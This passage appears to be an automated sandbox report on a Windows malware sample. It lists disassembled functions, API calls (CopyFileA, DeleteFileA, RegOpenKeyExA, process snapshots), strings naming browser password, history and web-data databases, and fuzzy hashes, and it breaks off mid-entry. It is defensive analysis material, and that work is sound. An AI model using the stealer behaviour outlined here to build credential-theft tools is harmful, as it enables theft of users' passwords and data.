                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 888 428787-4288cc DeleteFileA CopyFileA call 422843 906 4288ce-4288f9 call 43a0c0 888->906
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00428897
                                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004288B6
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004288DA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$CopyDeleteUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                            • String ID: C:\ProgramData\$<E
                                                                                                                                                                                                                                                                                            • API String ID: 3134562156-1062732236
                                                                                                                                                                                                                                                                                            • Opcode ID: 1dc461406ff4ef2b67ea95d6e394d442393c350d122ed3231eac641af7323cbc
                                                                                                                                                                                                                                                                                            • Instruction ID: 1e570ea21499aea3d5f253e6478c06357d2086eee86d9d4146b419b7b24b62a2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dc461406ff4ef2b67ea95d6e394d442393c350d122ed3231eac641af7323cbc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3411F7AB006149FDB14DBACEC91E9D73F6EFC9304B080138E416E7351DA68AE19CB58
                                                                                                                                                                                                                                                                                            Function 0042C6C8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 924 42c6c8-42c7b3 CreateDirectoryA 948 42c7b4 call 42b6b8 924->948 949 42c7b4 call 42b7fd 924->949 936 42c7b6-42c86b call 404f86 946 42c86d-42c8b4 936->946 948->936 949->936
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0042C7A4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                                                                            • String ID: C:\ProgramData\$lTD$lTD
                                                                                                                                                                                                                                                                                            • API String ID: 4241100979-3701453751
                                                                                                                                                                                                                                                                                            • Opcode ID: fd0e82dec119dba322a7c6096ded51b902f46ea9c2b987c5c6cec87d8c7672a0
                                                                                                                                                                                                                                                                                            • Instruction ID: 31c80a94cef3e32279e2b3b95fdfaa81a2b1e18fb5af080639bf195b1bb07545
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd0e82dec119dba322a7c6096ded51b902f46ea9c2b987c5c6cec87d8c7672a0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA515FB5F001108FDB14DF6DDC81AAA77F6EFC9304B088479A81AD7351DA34EA59CB98
                                                                                                                                                                                                                                                                                            Function 0040DDC3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 127fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 951 40ddc3-40df10 CopyFileA 970 40df16 call 40bc40 951->970 971 40df16 call 40bd53 951->971 972 40df16 call 40bd06 951->972 969 40df18-40df36 970->969 971->969 972->969
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040DEE9
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                                                            • String ID: $|X$C:\ProgramData\$'E
                                                                                                                                                                                                                                                                                            • API String ID: 1304948518-2551353523
                                                                                                                                                                                                                                                                                            • Opcode ID: b8ece8a38ac88d1a9e8b8c62dba14a6124fe639d5abe7aed50bc7201f7af8475
                                                                                                                                                                                                                                                                                            • Instruction ID: 210b412480b9b1f6e40c5c6a5c6a986acd163ec9f824bb5448706ba36133746a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8ece8a38ac88d1a9e8b8c62dba14a6124fe639d5abe7aed50bc7201f7af8475
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D4197BAB421109FD714DB6CDC81BDD73F5AF8A304B094565E806D3321DB74AE24CB99
                                                                                                                                                                                                                                                                                            Function 0040CB8C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124memoryfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040CBB0
                                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040CCB4
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040CCCD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateDeleteFileFree
                                                                                                                                                                                                                                                                                            • String ID: _passwords.db
                                                                                                                                                                                                                                                                                            • API String ID: 2485951164-1485422284
                                                                                                                                                                                                                                                                                            • Opcode ID: a7043d1debc52e48b3003d44f97e9eac390a076a658ce9e3e3632af536d91c4e
                                                                                                                                                                                                                                                                                            • Instruction ID: b37c3980acad7b287a63fd84c6568bc53c6d2d1415935e73d4ad3cc0f33b3f93
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7043d1debc52e48b3003d44f97e9eac390a076a658ce9e3e3632af536d91c4e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85414EB66401159BD704EB6CEC95E6E77F9FFCA7047084428E419D3311CA34AA26CB9E
                                                                                                                                                                                                                                                                                            Function 0040E0C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040E1F0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                                                            • String ID: $|X$C:\ProgramData\$'E
                                                                                                                                                                                                                                                                                            • API String ID: 1304948518-2551353523
                                                                                                                                                                                                                                                                                            • Opcode ID: 90415b50240b5b3216ec83fa10819a54488d92d7aab5751acc4f0ee742999494
                                                                                                                                                                                                                                                                                            • Instruction ID: a0ca7a678a9fc7aef83b92d14bb0b022872ceb26902699c26760bdc125b8b43a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90415b50240b5b3216ec83fa10819a54488d92d7aab5751acc4f0ee742999494
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C415EB67420109BDB05CB9CDCD1FDD77B5BF8A304B094839E40AE3361DA74AE298B59
                                                                                                                                                                                                                                                                                            Function 0040ED79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040EE9B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                                                            • String ID: C:\ProgramData\$'E
                                                                                                                                                                                                                                                                                            • API String ID: 1304948518-2523843158
                                                                                                                                                                                                                                                                                            • Opcode ID: 2882e95cde3e227961071db3bf314aefc9e93a392954357e6cde62046eb5ef51
                                                                                                                                                                                                                                                                                            • Instruction ID: fa38410b2714a6e77a67ab8d0ac84656252ce63968c3431b5881fbac74b51b6b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2882e95cde3e227961071db3bf314aefc9e93a392954357e6cde62046eb5ef51
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64417B76B400049FCB04DF9CDD81BAD77B5BF89214B084038E41AE3352DA34AE29CB9A
                                                                                                                                                                                                                                                                                            Function 0040E26E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040E382
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                                                            • String ID: $|X$_history.db
                                                                                                                                                                                                                                                                                            • API String ID: 4033686569-3470021098
                                                                                                                                                                                                                                                                                            • Opcode ID: a307596c9b0dbdd293c27af80e64e3424aa25886e0e5d8551a5afdc3c504056d
                                                                                                                                                                                                                                                                                            • Instruction ID: de087bb8a02b9b5954df5ad64bbb9d21ead85b46a7a89c4a5d4623f81effc206
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a307596c9b0dbdd293c27af80e64e3424aa25886e0e5d8551a5afdc3c504056d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 404163BAA411049FCB05CFA8DC81AEDB7F1FF89304B048429E815D3315DB78AA15CF59
                                                                                                                                                                                                                                                                                            Function 0040DF3F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040E049
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                                                            • String ID: $|X$_webdata.db
                                                                                                                                                                                                                                                                                            • API String ID: 4033686569-158154304
                                                                                                                                                                                                                                                                                            • Opcode ID: b2a32d48ddfb3c47622254f12c8ef012da89dcf3320ef21effe23d5c0090a455
                                                                                                                                                                                                                                                                                            • Instruction ID: 7ce97649fd713c523dbf5e134aa6649b44230df0f9e0713be51a9fe393079403
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2a32d48ddfb3c47622254f12c8ef012da89dcf3320ef21effe23d5c0090a455
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D4183BAA411149FCB04CFACDC81ADDB7F5BF89300B098415E815E7325DB78AA15CF99
                                                                                                                                                                                                                                                                                            Function 0041FEC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041FF42
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                                            • String ID: %s\%s$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                            • API String ID: 71445658-1969869098
                                                                                                                                                                                                                                                                                            • Opcode ID: c6c32dde087a60be459981c5a25d9cdae22c500a76205aa6044837812575c95c
                                                                                                                                                                                                                                                                                            • Instruction ID: d72de999b2892b00457b4301201e501fe1f29f5046f65ed3e118f347551177f9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6c32dde087a60be459981c5a25d9cdae22c500a76205aa6044837812575c95c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C01D8B96002015FD324DF58DC91E6777E9FB85304F04002DE946D3262EA74A9088B65
                                                                                                                                                                                                                                                                                            Function 0041FDC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041FE30
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                                            • String ID: ?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                            • API String ID: 71445658-2633480413
                                                                                                                                                                                                                                                                                            • Opcode ID: d320a3521d35f168751300790cb266167562fdbf6311ac38afecd85639501f0b
                                                                                                                                                                                                                                                                                            • Instruction ID: c8f2481e82a16eca426fec0ccf16404ca92c35e872ef3ce0eab83674d6df9e99
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d320a3521d35f168751300790cb266167562fdbf6311ac38afecd85639501f0b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7001D6B5A00204AFD3249F19EC94E2BBBE8FFC5345F05851EE84687391DA749804CB55
                                                                                                                                                                                                                                                                                            Function 00420420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0042043C
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119), ref: 0042047D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Openmemset
                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                            • API String ID: 180050240-1514646153
                                                                                                                                                                                                                                                                                            • Opcode ID: 2ad32eb8251b01e98074a0d0486dcfb936fe310c63f78620c8fe9f07967d2f10
                                                                                                                                                                                                                                                                                            • Instruction ID: 704948cce47b6def0a0afe579a61564877315a8cc2ef23d99e61b0d3b5485971
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ad32eb8251b01e98074a0d0486dcfb936fe310c63f78620c8fe9f07967d2f10
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F0F6766412116BD214DB6ADC4AD2B7A6CFBC7314F05813CF818C7302D674A914C766
                                                                                                                                                                                                                                                                                            Function 004235EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00423615
                                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000), ref: 00423622
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID: 5$#w
                                                                                                                                                                                                                                                                                            • API String ID: 2353314856-2839390797
                                                                                                                                                                                                                                                                                            • Opcode ID: bae8fede1a8106b78921d416f13b3c645951278458bb2964471e672d63109a45
                                                                                                                                                                                                                                                                                            • Instruction ID: 5be2964b6b9545829f7e644963e2359ac3e23bc5df8f00164b782a01543cc960
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bae8fede1a8106b78921d416f13b3c645951278458bb2964471e672d63109a45
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F06DB5342215AFE7A0DB1DED85F6673E8EBCA304F550438AA04C7382DA74DD208765
                                                                                                                                                                                                                                                                                            Function 004232FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042331D
                                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000), ref: 0042332A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
